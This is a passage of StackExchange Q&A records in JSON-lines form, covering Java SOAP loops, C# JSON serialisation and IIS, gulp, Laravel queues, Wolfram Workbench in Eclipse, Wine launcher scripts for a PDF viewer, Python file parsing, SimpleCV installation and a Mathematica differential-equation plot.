1));\n SOAPElement soapBodyElemaaaaaaa = CHANGINGVARIABLE.addChildElement(\"LocationCode\");\n soapBodyElemaaaaaaa.addTextNode(listLocationCodes.get(cnt - 1));\n<\/code>\nComment: Please tell me if I understood your problem correctly. You have \"repeating\" lines of code in the second block like: changingVar = soapBodyElem7... changingVar2 = soapBodyElem8... changingVar3 = soapBodyElem9..?\nComment: @MichaelSanchez In order to define a SOAP Element, you have to create a variable. 
Where I have changing variable, I need different variables for that area. So defined different variables. Now I would easily use predefined variable names, however their may be 10000 lines or 2.\nComment: Not sure if you've solved this already. The code sample is confusing though where CHANGINGVARIABLE is declared as int[] then later as SOAPElement. Have you tried using a SOAPElement array or list?\nComment: @MichaelSanchez Sanchez That I am unsure of how to do. However if this makes a little more sense. The first set of code pulls the content from an xml file. Now the content needs to be stored as an element to make a soap message. However, where Changingvariable is, you can simply define that as v1, v2, v3, however, that is only if their is one line. What if their is 20 lines? the cnt will keep track of that, but how can i make a loop to get this to work for several?\nAnswer: Given your explanation, you can either choose between using a list or an array. Then add new SOAPElements to the list or array by looping.\n<code>**For Array:**\nSOAPElement[] soapArr = new SOAPElement[size];\nfor(int i=0; i < size; i++) {\n soapArr[i] = new SOAPElement();\n}\n\n**For List:**\nList soapList = new LinkedList();\nfor(int i=0; i < size; i++){\n soapList.add(new SOAPElement());\n}\n<\/code>\nThen loop through that second code chunk while referring to the CHANGINGVARIABLEs as the following:\n<code>soapArr[i]<\/code> or <code>soapList.get(i)<\/code>.\nI hope I'm understanding your need properly.\n","meta":{"source":"stackoverflow","title":"Naming convention using java","dup_signals":{}},"subset":"stackexchange"} +{"text":"IIS7.5 GetHostNamesPerSite using C#\n\nQuestion: <code>List<string> GetHostNamesPerSite(string SiteName)\n<\/code>\nHow can I use IIS in C# to GetHostNamesPerSite?\nComment: What do you mean? As in the site bindings?\nAnswer: If you mean get a list of all of the host header host names bound to a site:\n<code>public static List<string> GetHostNamesPerSite(string siteName)\n{\n using (ServerManager sm = new ServerManager())\n {\n Site site = sm.Sites.First(s => s.Name == siteName);\n return site.Bindings.Select(s => s.Host).ToList();\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"IIS7.5 GetHostNamesPerSite using C#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Post json Object which property name has space to third party api from c#\n\nQuestion: I'm calling third party api from my asp.net mvc project. That api requires json object that has property name with space. But in c# we can't create property name with space. How Can I do that, I'm stuck?\nI have tried using JsonProperty, but It is not working. I have tried to replace string in serialize string and then send that string to api but that gives me total error.\n<code>{\n \"Single\":14000,\n \"Double\":14500,\n \"Triple\":15000,\n \"ExtraBed\":15500,\n \"ExtraChild\":16000,\n \"ExtraAdult\":16000\n}\n<\/code>\nBut instead of ExtraBed, I have to pass as 'Extra Bed'.\nComment: @dev_la , GET, POST doesn't matter . This is just about serialising\/deserialsing\nComment: Have you tryed [JsonProperty(PropertyName = \"Extra Bed\")]?\nComment: I'd use [Newtonsoft](https:\/\/www.newtonsoft.com\/json) for a clean and uncomplicated solution\nComment: What do you use for serialization?. Could you please provide more code? 
Looks like serialization ignores your attribute. Show how you do the serialization\nComment: @BasilKosovan : yes I have tried that also\nComment: [JsonProperty(PropertyName = \"Extra Bed\")]\npublic decimal ExtraBed { get; set; }var p = new JavaScriptSerializer().Serialize(_AxisRoom);\n\n AxisRoom _hotelnew = JsonConvert.DeserializeObject(p);\nComment: @ScottyDoesKnow : I use it, but in the get api, where the response property name is changed; this question is about the post api request\nComment: `JavaScriptSerializer` doesn't support renaming of properties, see [JavaScriptSerializer - custom property name](https:\/\/stackoverflow.com\/a\/32488106\/3744182).\nAnswer: <code>JsonPropertyAttribute<\/code> has no effect on <code>JavaScriptSerializer<\/code>. There is no attribute for <code>JavaScriptSerializer<\/code> that changes the property name. You can write a custom <code>JavaScriptConverter<\/code> for it, but I recommend just using <code>Newtonsoft<\/code>.\n<code> class AxisRoom\n {\n [JsonProperty(\"Extra Bed\")]\n public decimal ExtraBed { get; set; }\n }\n\n AxisRoom _AxisRoom = new AxisRoom { ExtraBed = 3 };\n var result = JsonConvert.SerializeObject(_AxisRoom);\n<\/code>\n<code>result<\/code> is equal to <code>{\"Extra Bed\":3.0}<\/code>\n","meta":{"source":"stackoverflow","title":"Post json Object which property name has space to third party api from c#","dup_signals":{}},"subset":"stackexchange"}
+{"text":"Generate multiple files from a single stream. Gulp\n\nQuestion: I use <code>for<\/code>, but this is not right.\n<code>gulp.task('themes', function() {\n for (var color in config.themes) {\n for (var shine in config.shines) {\n gulp.src(['src\/scss\/_config.scss'])\n .pipe(rename('_' + config.themes[color] + '-' + config.shines[shine] + '.scss'))\n .pipe(gulp.dest('src\/scss\/themes'));\n }\n }\n});\n<\/code>\nHow could I do this with streams?\nAnswer: Simply chain multiple gulp.dest() pipes:\n<code>gulp.task('themes', function() {\n for (var color in config.themes) {\n for (var shine in config.shines) {\n gulp.src(['src\/scss\/_config.scss'])\n .pipe(rename('_' + config.themes[color] + '-' + config.shines[shine] + '.scss'))\n .pipe(gulp.dest('src\/scss\/themes'))\n .pipe(gulp.dest('src\/scss\/themes2'));\n }\n }\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Generate multiple files from a single stream. 
Gulp","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to clear Laravel Queue using iron.io\n\nQuestion: I'm working on TeamSpeak management system based on Laravel 4\nthe problem is when i restart the script it add the queue again unless i restart the Queue listener \nis there a way to clear the old Queue on script startup without the need to restart the queue:listen ??\nam using Iron.io service as a queue engine\nThanks in advance\n\/\/EDIT\nThanks to \"thousandsofthem\"\nit works with Laravel like this:\n<code>$queue_name = Config::get('queue.connections.iron.queue');\nQueue::getIron()->clearQueue($queue_name);\n<\/code>\nAnswer: How about touching <code>$iron_mq->clearQueue($queue_name)<\/code> ?\nhttps:\/\/github.com\/iron-io\/iron_mq_php\/blob\/master\/IronMQ.class.php#L235\nNo idea how Laravel exposes it though\nComment: finally got time to test it works like charm thanks :)\n","meta":{"source":"stackoverflow","title":"How to clear Laravel Queue using iron.io","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to install the Wolfram Workbench plugin into Eclipse Kepler or Neon?\n\nQuestion: Trying to install the Wolfram Workbench plugin into Eclipse Juno fails. How is it possible to install in into Eclipse Kepler ? Or Eclipse Neon? \nComment: @Ajasja One reason to look into this was I did not succeed to install the git plugin [EGit](http:\/\/download.eclipse.org\/egit\/updates) into the standalone version of Workbench.\nComment: @Ajasja Afaik, there have been no updates to the standalone version of Workbench. On the other hand Eclipse is actively being developed. So you can benefit from using newer Eclipse versions together with the plugin.\nComment: It is actually possible to install it in Juno, I've done it before. I didn't like Juno though so I never tested it thoroughly... it might be unstable.\nComment: So what I meant to say was, if you really want to try then I'll probably be able to remember :)\nComment: Maybe others care? For me it does not matter that much. Kepler seems to work fine.\nComment: Could somebody comment on what the benefit is of installing into Eclipse vs. using the standalone (branded) version of WB? (This is probably not a big\/interesting enough question for the main site, this is why I'm asking in the comments)\nComment: This works fine on OS X 10.8.2, thanks Rolf. But what are the advantages of this version of Eclipse for Mathematica development?\nComment: For example you don't have to work around that strange update error you ran into (it's possible, but not nice). Also I just like the look of Kepler much more. And you can install Egit and other plugins which might not install well with Indigo (the Eclipse version WWB is based on).\nAnswer: Update October 2016: As mentioned here it is officially documented how to install WWB into Eclipse Neon (64 bit)! Great! Thanx WRI.\nThis is tested on Windows and Linux:\n\nDownload and install a 32bit version of Eclipse Kepler from http:\/\/www.eclipse.org\/downloads\/\nOn Linux x86_64 make sure to have 32bit Java installed and configured, \nand, e.g. 
on Fedora do: yum install glibc.i686 libgcc.i686 gtk2.i686 libXtst.i686 \nStart Eclipse and go to Help\/Install New Software \nClick Add\nEnter http:\/\/download.eclipse.org\/releases\/indigo for Location, Indigo for Name\n\nClick OK and again Add and enter http:\/\/workbench.wolfram.com\/update\n\nWait a bit until you see\n\nInstall WWB core (and possibly WWB webMathematica), hit ok a couple of times\nDon't forget to eventually adjust your location of Mathematica:\n\nHere the About Eclipse box\n\nAnd here the proof that it works:\n\nOne big productivity boost for me to use Eclipse is that there \n are various vi plugins.\n One free possibility to use is vrapper , another one (non-free) is viplugin\nI also personally like this plugin which enables font-size changing by Crl++ and Ctrl+- \nComment: Maybe worth stressing that \"The workbench 2.0 plugins will install into eclipse 3.4 - 3.8, but are not\ncompatible with 4.2\" according to WRI.\nComment: This worked on OS X 10.8.2. However, the About box says 4.3.0, while the splash screen says \"Juno\" (which is 4.2)\nComment: Thanks for documenting this! Just to clarify, are you using the 3.x or the 4.x series? (It seems they're being developed in parallel at the moment. I used 3.8 for Workbench. If I understand it correctly, \"Juno\" could be either 4.2 or 3.8.)\nComment: (or even if both are not named Juno, they should have the same functionality)\nComment: @b.gatessucks As I said in a comment above, you can install the plugin in 4.x, you just have to jump through some hoops.\nComment: @sebhofer Could you please mention how to do it ? I use Fedora, which ships Eclipse 4.2; the Workbench plugin doesn't work out of the box.\nComment: @sebhofer Following your walkthrough on Win 7 I get the following error: \nAn internal error occurred during: \"FrontEnd Job::Open Notebook\".\ncom.wolfram.jlink.NativeLink.MLOpenString(Ljava\/lang\/String;[Ljava\/lang\/String;)J\nComment: @b.gatessucks I did this a while ago and unfortunately I didn't make notes :( The point is that the workbench plugin requires 3 bundles which are not included in the new release. They are listed on [the release page](http:\/\/www.eclipse.org\/eclipse\/development\/porting\/4.2\/incompatibilities.php). 1 one of them is just a dummy package which does nothing, the others can be installed if I remember correctly. I will try to remember what I did, but I don't have the time right now. I think the error messages during the install give a starting point.\nComment: @MarkusRoellig Even if you are on 64bit Windows you have to download the 32bit Eclipse version. Otherwise you get that NativeLink.MLOpenString error. Sorry, should have mentioned that earlier. Corrected now in the instructions.\nComment: What about in OS X (currently at 10.8.2): must one use the 32-bit Eclipse rather than he 64-bit version?\nComment: Although WRI lists just version 2.0 of Workbench, curiously the MacKeeper app has for some time indicated that it's out of date and that there's a version 2.1.6 available. Is the latter perhaps an internal-to-WRI version not yet released, or abandoned?\nComment: @murray I had to use the 32bit one too. The 64 bit just gave me a \"file broken\" error (or something like that).\nComment: @rm-rf Thanks so much for the clear instructions. (worked like a charm on Win7 machine). Am I correct in assuming the 32 vs 64 bit version of eclipse is really of little consequence? 
(it's really just whether or not eclipse itself is 32 or 64 bit, and has NO bearing on your ability to program\/compile 64 bit programs, of course assuming you have the right 64 bit JDK installed.) I believe VS2012 is still only a 32 bit program. I mention\/ask about this because I get the sense people are defaulting to a \"64 bit is better mentality\", when it really make no difference.\nComment: @telefunkenvf14 I didn't write the answer, Rolf Mertig did :)\nComment: @rm-rf - I'm always amused by these little data points about myself... Apparently my short term memory lasts about as long as this particular comment thread. :) Sooo... Thanks Rolf!\nComment: @telefunkenvf14 It does make a difference here. 32-bit Eclipse is mandatory.\nComment: @rm-rf I think something may have gotten fixed between then and now, because on Mac OS X 10.9.2 I was able to install Workbench into a 64 bit Eclipse Kepler.\nComment: With 4.x, you may have to first copy org.eclipse.core.boot and org.eclipse.update.ui jars to your eclipse\/plugins\/ folder. Get them from a 3.x release.\nComment: For Windows 7 64 bit, Java 1.7.24 64bit, I've installed eclipse 3.6.2 32bit and installed mathematica plugin as 'Rolf Mertig' described and everything is working perfect now. If you've problems with other versions of eclipse try eclipse 3.6.2\nComment: What is the difference between Wolfram Workbench and this one which can be installed on eclipse?\nComment: Great post, thank you for sharing with us. May I add the following :\n\nIf you are looking on how to install and configure 32 bit Java on a 64bit Ubuntu 14.04 (trusty) machine, read the following comment \n\nhttp:\/\/mathematica.stackexchange.com\/a\/97161\/18906\n\nif you are looking on how to configure your 32 bit java execute the following command\n\n sudo update-alternatives --config java\nComment: @RolfMertig Did you get .nb files work in Eclipse Wolfram Workbench? I extended the thread to Ubuntu 16.04 here http:\/\/askubuntu.com\/q\/766993\/25388\nComment: @Masi Yes. But Wolfram Research helped. Please contact the official Wolfram support. They are very friendly and helpful. I think a Wolfram Workbench 3 version will come to light soon. At least this has been the rumor for a couple of years.\nComment: Will the latest version of the plugin, dated 28 October 2016, work with the 64-bit version of Eclipse (Neon)? This is under macOS Sierra 10.12.1, which is of course a 64-bit OS.\nComment: @murray Yes, sure. Works fine.\nComment: @murray I've been running Neon on macOS 10.10.5 since before the conference. It is a nice upgrade. :)\n","meta":{"source":"mathematica.stackexchange","title":"How to install the Wolfram Workbench plugin into Eclipse Kepler or Neon?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to handle HRESULTs in Outlook addin?\n\nQuestion: Based on this SO answer: Catching COMException specific Error Code, I'd like to know, to properly handle COMExceptions across OSs and multiple versions of OL, if I need to only look at a specific portion of the exception. 
For example,\n<code>private const uint HRESULT_OPERATIONABORTED = 0x80004004;\n\n\/\/ ...\n\n try {\n \/\/ something that could throw COMExceptions\n } catch (System.Runtime.InteropServices.COMException e) {\n\n switch ((uint)e.ErrorCode) {\n\n case HRESULT_OPERATIONABORTED:\n break;\n\n default:\n break;\n }\n }\n<\/code>\nIs this sufficiently cross-platform, or is it necessary to consider only a part of the error code?\nEDIT - Just to clarify, my exact question is whether comparing <code>(uint)e.ErrorCode<\/code> to <code>0x80004004<\/code> is too specific (that is to say, whether or not I always get <code>0x80004004<\/code> for this particular error, regardless of OS\/OL), or if this is the proper way to do things.\nAnswer: You may want to also consider catching things like System.OutOfMemoryException and other exceptions that are the result of HRESULTs returned from COM objects. Not all failed HRESULTs result in COMException.\nFor most of the MAPI errors I've seen, the error codes don't vary from what's declared in the standard C MAPI header files, so I think the switch statement would be fine. In other words, that method shouldn't be any less compatible than a C-written MAPI client application.\nAnswer: You have little to fear as far as cross-platform compat goes, COM only runs on Windows. Similarly, the error code is a well defined one. You can look up the standard COM error codes in the WinError.h SDK header file. It is E_ABORT. I'd recommend you actually use that identifier.\nYou'll find this header in c:\\program files\\microsoft sdks\\windows\\v6.0\\include. It is v7.0 for VS2010.\nComment: I only meant between, say, XP and Win7. Thanks for the header, that's exactly what I needed.\n","meta":{"source":"stackoverflow","title":"How to handle HRESULTs in Outlook addin?","dup_signals":{}},"subset":"stackexchange"} +{"text":"C# Display SQL output into textbox\n\nQuestion: I am having issues trying to display the result of an SQL query into a textbox in my WPF program. My code looks like this:\n<code>private void btnCompare_Click(object sender, RoutedEventArgs e)\n {\n try\n {\n string commandText = \"SELECT ID, FirstName, LastName, Email, City FROM ( SELECT ID, FirstName, LastName, Email, City FROM CompareTable UNION ALL SELECT MainTable.ID, MainTable.FirstName, MainTable.LastName, MainTable.Email, MainTable.City FROM MainTable ) CompareTable GROUP BY ID, FirstName, LastName, Email, City HAVING COUNT(*) = 1\";\n SqlConnection conn = new SqlConnection(connectionstring);\n SqlCommand comm = new SqlCommand(commandText, conn);\n conn.Open();\n txtResult.Text = (string)comm.ExecuteScalar();\n conn.Close();\n }catch(Exception d)\n {\n MessageBox.Show(d.ToString());\n }\n \n }\n<\/code>\nWhen I run the query in the Azure DB, I get the output I'm looking for.\nBut the for some reason, the result output is an Int32 variable, this is the error I get:\n\nCan someone explain why the output is not a string?\nAnswer: <code>ExecuteScalar()<\/code> returns a single value, which is the first column of the first row if the query returns a table. So it's trying to \"cast\" the first <code>ID<\/code> from an integer to a string and fails. I suspect you want <code>ExecuteReader<\/code> instead, loop through the results, and build a string somehow.\nOr you could fill a <code>DataTable<\/code> and get the data from the rows and columns of that. There are plenty of examples out there of both methods.\nComment: Ah that makes sense, I should've done more research about that. 
Thanks!\n","meta":{"source":"stackoverflow","title":"C# Display SQL output into textbox","dup_signals":{}},"subset":"stackexchange"} +{"text":"Open file using custom command: how to specify the file in cmd line?\n\nQuestion: I want to open PDF using PDF-XChange Viewer through WINE. How should I specify the pdf file name in the \"custom command\" line so that I can open a PDF file using PDF-XChange Viewer by double clicking it? I tried to use the \\\"z:%f\\\" following the suggestion here for using Foxit reader. But my PDF-XChange Viewer only starts with an empty window. \n<code>wine \"c:\/Program Files\/Tracker Software\/PDF Viewer\/PDFXCview.exe\" \\\"z:%f\\\"\n<\/code>\nI use Ubuntu 10.04 and WINE 1.2.2. PDF-XChange Viewer version 2.5.\nComment: I suspect you need `\"c:\/Program\\ Files\/Tracker\\ Software\/PDF\\ Viewer\/PDFXCview.exe\"`\nComment: No, he does not, the \"\" are used for that...\nComment: Bruno Pereira is right, I could actually start PDF-XChange Viewer if I double click on a PDF file. But the file is not opened, only the program is executed. Obviously the file name is not passed successively to the PDF viewer.\nComment: Thiy this: wine \\`\"C:\\Program Files\\Tracker Software\\PDF Viewer\\PDFXCview.exe\" z:\"%f\"`\nComment: @lukasz: the backticks cause the PDF viewer fail to even start.\nAnswer: Found blog entries about the same problem for Foxit reader and for PDF-XChange Viewer. None of them worked for me. So I edited them and got one tailored for my case:\n<code>#!\/bin\/bash \nFilename=\"z:${1\/\/\\\/\/\\\\}\"\nwine \"C:\\Program Files\\Tracker Software\\PDF Viewer\\PDFXCview.exe\" $Filename\n<\/code>\nSave this bash script and open pdf using this script. Now double click pdf files will open them using PDF-XChange Viewer.\nAnswer: If the script works then you should accept that answer even though it was your own.\nWhat has worked here for other apps as far as a custom command was close to what you were trying, some small differences.\n<code>wine \"C:\\Program Files\\Tracker Software\\PDF Viewer\\PDFXCview.exe\" Z:%f\n<\/code>\nReferenced here for photoshop with add. info on altering the display name if desired for right click use - http:\/\/ubuntuforums.org\/showpost.php?p=9193687&postcount=9\nAnswer: This is based on @Flint's excellent script.\nAt first I tried <code>\"Z:\"%U<\/code> variable at the end of desktop file <code>Exec=<\/code> field for Wine programs. It worked fine until I opened a program without a file specified. Wine programs complained about missing file because the <code>Exec=<\/code> line pointed to the drive Z: which clearly is not a file but absolute file path instead. <code>File not found: Z:<\/code> or similar messages popped up in a Wine program. Bit annoying.\nProblem with <code>\"Z:\"%U<\/code> is that it's not a conditional variable if Z: is used there. However, Wine absolutely requires Z: because it can't find correct file paths otherwise.\nYour script makes the whole <code>\"Z:\"%U<\/code> thing a conditional clause. The script does the job exactly as I've wished for.\nHowever, the script should consider all exe files written in uppercase, too. By now, it can't point any MS Office files (docx, pptx...) to MS Office 2010 because all program executables are written like <code>WINWORD.EXE<\/code> or <code>POWERPNT.EXE<\/code>. 
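(A case-insensitive test might cover both spellings in a single branch, e.g. something along the lines of <code>[[ ${arg,,} == *.exe ]]<\/code> with bash 4 or newer, though I have not verified that in this script.) 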
Of course executables could be renamed in lower case, but I prefer a more universal solution rather than renaming single exe's for every program.\nA dirty but universal solution is to modify the script code like this:\n<code>#!\/bin\/bash\n\nallargs=(\"$@\")\n\nfixpath=0\nfor idx in \"${!allargs[@]}\"; do\n arg=\"${allargs[$idx]}\"\n\n if [[ $fixpath -eq 0 ]]; then\n # fix file paths only after the first executable is found in arg\n if [[ \"$arg\" == *.exe ]]; then\n fixpath=1\n fi\n if [[ \"$arg\" == *.EXE ]]; then\n fixpath=1\n fi\n continue\n elif [[ $fixpath -eq 1 ]]; then\n # if arg starts with '\/' and it's a path that exists on host\n # precede the path with drive 'Z:'\n if [[ \"${arg:0:1}\" == '\/' && -e \"$arg\" ]]; then\n allargs[$idx]=\"z:${arg\/\/\\\/\/\\\\}\"\n fi\n fi\ndone\n\nexec env \"${allargs[@]}\"\n<\/code>\nThe <code>or<\/code> operator did not work for some reason. I'm sure there is a more elegant way to achieve the same result, anyway.\nAnswer: If that program is already installed using wine then I don't think it needs an absolute path. I think only \n<code> wine pdfxcview filename\n<\/code>\nwill open the file.\nOkay, maybe my reply is stupid. What are you actually trying to do? Are you trying to fix the program launch error?\nComment: No, I did not have a problem starting the pdf viewer. 
This goes in <code>\/usr\/local\/bin<\/code> and be sure to give it <code>chmod +x<\/code>\n<code>#!\/bin\/bash\n\nallargs=(\"$@\")\n\nfixpath=0\nfor idx in \"${!allargs[@]}\"; do\n arg=\"${allargs[$idx]}\"\n\n if [[ $fixpath -eq 0 ]]; then\n # fix file paths only after the first executable is found in arg\n if [[ \"$arg\" == *.exe ]]; then\n fixpath=1\n fi\n continue\n elif [[ $fixpath -eq 1 ]]; then\n # if arg starts with '\/' and it's a path that exists on host\n # precede the path with drive 'Z:'\n if [[ \"${arg:0:1}\" == '\/' && -e \"$arg\" ]]; then\n allargs[$idx]=\"Z:$arg\"\n fi\n fi\ndone\n\nexec env \"${allargs[@]}\"\n<\/code>\nAnd for the app's .desktop file, call it <code>pdfxce.desktop<\/code> and put it in <code>~\/.local\/share\/applications\/<\/code> and its content should look like this\n<code>[Desktop Entry]\nName=PDF-XChange Editor\nType=Application\nTerminal=false\nExec=wine-env WINEDEBUG=-all WINEPREFIX=\/home\/<user>\/.local\/share\/bottles\/pdfxce wine PDFXEdit.exe %F\nIcon=\/home\/<user>\/.local\/share\/icons\/bottles\/pdfxce-pdfxedit.png\nPath=\/home\/<user>\/.local\/share\/bottles\/pdfxce\/drive_c\/Program Files\/Tracker Software\/PDF Editor\nStartupNotify=true\nStartupWMClass=PDFXEdit.exe\n<\/code>\nYou need to change the part with your own username. I keep all of my wineprefixes dirs in a folder called \"bottles\". You may have your own way to organize your wineprefixes so change all the parts that contain \"bottles\" accordingly\nAnd last step, assign PDF files to the app as per normal (Right click on pdf -> <code>Properties<\/code> -> <code>Open With<\/code> tab)\nReference: Freedesktop's desktop entry specification\nAnswer: I followed this link to install 32 bit PDF XChange viewer in Ubuntu 64 Bit 14.04\nThen the link shows a script to open the PDF Xchange viewer with the file-name as argument. I made that script and kept that in <code>\/bin<\/code>\nThen I edited the <code>~\/.local\/share\/applications\/wine-extension-pdf.desktop<\/code> to this:\n<code>[Desktop Entry]\nType=Application\nName=PDF-XChangeViewer\nMimeType=application\/pdf;\nExec=PDFXCview %f\nNoDisplay=true\nStartupNotify=true\n<\/code>\nMy script was named <code>PDFXCview<\/code>\n","meta":{"source":"askubuntu","title":"Open file using custom command: how to specify the file in cmd line?","dup_signals":{}},"subset":"stackexchange"} +{"text":"making list of white space separated numbers from a file\n\nQuestion: I want to read some numbers from a file which are, which I am unable to read in two lists for further calculation like Mean and STDEV.\n 0.0000000 0.0000005\n 0.0100000 0.1675796\n 0.0200000 0.2042502\n 0.0300000 0.2064999\n 0.0400000 0.2237432\n 0.0500000 0.2245723\n 0.0600000 0.2365732\n 0.0700000 0.2433299\n 0.0800000 0.2556339\n 0.0900000 0.2569953\n 0.1000000 0.2658122\n 0.1100000 0.2718526\n 0.1200000 0.2741648\n<code>import os \n\ndirectory= \"\/media\/quinn\/Joker\/post_analysis\/KBH00\"\n\nfor x in range (252, 256):\n os.chdir(directory + str(x) +'\/')\n print(os.getcwd())\n with open ('rmsd.xvg', 'r') as rmsd:\n line_19_to_end = rmsd.readlines()[18:]\n print(\"Values of RMSD are:\")\n for line in line_19_to_end:\n print(\"%s\" %(line))\n<\/code>\nComment: us can use `line_19_to_end = list(map(float, line_19_to_end.split()))`\nComment: The problem is my data is in two columns and I can't use split in that condition.\nComment: Why can't you use split? 
Can you show the structure of the data in your file, if it isn't simply two space-separated floats per line?\nAnswer: When you are iterating add all values at the 0th position to a new list <code>col1<\/code> and 1st position to another list <code>col2<\/code>, after conferring each values to float. \n<code>import os \n\ndirectory= \"\/media\/quinn\/Joker\/post_analysis\/KBH00\"\n\nfor x in range (252, 256):\n os.chdir(directory + str(x) +'\/')\n print(os.getcwd())\n col1,col2=[],[]\n with open ('rmsd.xvg', 'r') as rmsd:\n line_19_to_end = rmsd.readlines()[18:]\n print(\"Values of RMSD are:\")\n for line in line_19_to_end:\n print(\"%s\" %(line))\n line = list(map(float, line.split()))\n col1.append(line[0])\n col2.append(line[1])\nprint(col1,'\\n',col2)\n<\/code>\n","meta":{"source":"stackoverflow","title":"making list of white space separated numbers from a file","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to install SimpleCV on mac OS 10.8.1\n\nQuestion: So I have been trying to install SimpleCV for some time now. I was finally able to install pygame, but now I have ran into a new error. I have used pip, easy_install, and cloned the SimpleCV github repository to try to install SimpleCV, but I get this error from all:\n<code> ImportError: No module named scipy.ndimage\n<\/code>\nIf it is helpful, this is the whole error message:\n<code> Traceback (most recent call last):\n File \"\/usr\/local\/bin\/simplecv\", line 8, in <module>\n load_entry_point('SimpleCV==1.3', 'console_scripts', 'simplecv')()\n File\"\/System\/Library\/Frameworks\/Python.framework\/Versions\/2.7\/Extras\/lib\/python\/pkg_resource s.py\", line 318, in load_entry_point\n return get_distribution(dist).load_entry_point(group, name)\n File\"\/System\/Library\/Frameworks\/Python.framework\/Versions\/2.7\/Extras\/lib\/python\/pkg_resources.py\", line 2221, in load_entry_point\nreturn ep.load()\n File\"\/System\/Library\/Frameworks\/Python.framework\/Versions\/2.7\/Extras\/lib\/python\/pkg_resources.py\", line 1954, in load\n entry = __import__(self.module_name, globals(),globals(), ['__name__'])\n File \"\/Library\/Python\/2.7\/site-packages\/SimpleCV\/__init__.py\", line 3, in <module>\n from SimpleCV.base import *\n File \"\/Library\/Python\/2.7\/site-packages\/SimpleCV\/base.py\", line 22, in <module>\nimport scipy.ndimage as ndimage\n ImportError: No module named scipy.ndimage\n<\/code>\nI am sorry if there is a simple solution to this, I have been trying and searching for solutions for well over an hour with no luck. \nAnswer: You need to have SciPy installed to use SimpleCV.\nTake a look on this site: http:\/\/penandpants.com\/2012\/02\/24\/install-python\/\nYou may also need to install opencv, you can use homebrew for that.\nAnswer: On osx 10.9 I did\n<code>sudo pip install scipy\n<\/code>\nIt worked.\n","meta":{"source":"stackoverflow","title":"How to install SimpleCV on mac OS 10.8.1","dup_signals":{}},"subset":"stackexchange"} +{"text":"Dynamical System\n\nQuestion: I'm Trying to solve dynamical system in friedmann universe. But, I have problems with initial conditions to $\\Omega_{\\Lambda}$ and $\\Omega_{k}$. 
The code that i'm implementing is\n<code>ode1[x0_, y0_] := NDSolve[{x'[n]] == 2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) x[n], y'[n] == 2 ((3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/ 2 x[n]) y[n], x0] == x0, y[0] == y0}, {x[n], y[n]}, {n, -0.7, 0.54}, MaxSteps -> Infinity]\n<\/code>\nWhere $\\gamma=1$, $n=\\ln a$, $x=\\Omega_{\\Lambda}$ and .$y=\\Omega_{k}$ For example, I try\n<code>sol[1] = ode1[-0.5, 1.5]; sol[2] = ode1[1, 0]; sol[3] = ode1[0, 1]; sol[4] = ode1[0.8, 0.2]; sol[5] = ode1[-0.3, 1.3]; sol[6] = ode1[1.3,-0.3]; sol[7] = ode1[1.2, -0.2]; sol[8] = ode1[0.2, 0.8];\n\nParametricPlot[Evaluate[Table[{x[n], y[n]} \/. sol[i], {i,8}]], {n, -0.7, 0.54}, PlotStyle -> {Thick}, PlotRange -> {{-0.5, 1.5}, {-0.5, 1}}, PlotPoints -> 100, AxesLabel -> {\"x\", \"y\"}, Axes -> True]\n<\/code>\nThe plot shows anything. \nAnswer: Use code\n<code>ode1[x0_, y0_] := \n NDSolve[{x'[n] == \n 2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) x[n],\n y'[n] == \n 2 ((3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) y[n], \n x[0] == x0, y[0] == y0} \/. \\[Gamma] -> 1, {x, y}, {n, -0.7, 0.54},\n MaxSteps -> Infinity]\nsol[1] = ode1[-0.5, 1.5]; sol[2] = ode1[1, 0]; sol[3] = ode1[0, 1]; \nsol[4] = ode1[0.8, 0.2]; sol[5] = ode1[-0.3, 1.3]; \nsol[6] = ode1[1.3, -0.3]; sol[7] = ode1[1.2, -0.2]; \nsol[8] = ode1[0.2, 0.8];\n\nParametricPlot[\n Evaluate[Table[{x[n], y[n]} \/. sol[i], {i, 8}]], {n, -0.7, 0.54}, \n PlotStyle -> {Thick}, PlotRange -> All, PlotPoints -> 100, \n AxesLabel -> {\"x\", \"y\"}, Axes -> True]\n<\/code>\n\nPhase space of the system \n<code>reg = ImplicitRegion[\n 1 - x - y < 0 && -.5 <= x <= 1.5 && -1 <= y <= 1, {x, y}]; reg1 = \n ImplicitRegion[\n 1 - x - y > 0 && -.5 <= x <= 1.5 && -1 <= y <= 1, {x, y}];\n\nsp = StreamPlot[{2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/\n 2 x[n]) x[n], \n 2 ((3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) y[\n n]} \/. \\[Gamma] -> 1, {x[n], y[n]} \\[Element] reg1, \n FrameLabel -> {Subscript[\\[CapitalOmega], \\[CapitalLambda]], \n Subscript[\\[CapitalOmega], K]}, StreamPoints -> Fine]\n\nrp = Show[RegionPlot[reg, BoundaryStyle -> None], \n Graphics[{Black, Circle[{0, 0}, 2], \n Inset[\\[CapitalOmega] < 0, {1, 0.5}]}]]\nShow[sp, rp]\n\nsp1 = StreamPlot[{2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/\n 2 x[n]) x[n], 1 - x[n] - y[n]} \/. \\[Gamma] -> 1, {x[n], -.5, \n 1.5}, {y[n], 0., 2}, \n FrameLabel -> {Subscript[\\[CapitalOmega], \\[CapitalLambda]], \\\n\\[CapitalOmega]}, StreamPoints -> Fine]\n<\/code>\nComment: Thanks for your answer, the problem is that I want to reproduce the figure 2 [link] (http:\/\/arxiv.org\/abs\/physics\/0108066v1) in page 13.\nComment: @Fisjog Show how to do it?\nComment: thanks a lot! @alex-trounev\n","meta":{"source":"mathematica.stackexchange","title":"Dynamical System","dup_signals":{}},"subset":"stackexchange"} +{"text":"WPF: Datagrid - Apply DataGridTemplateColumn.CellTemplate dynamically\n\nQuestion: 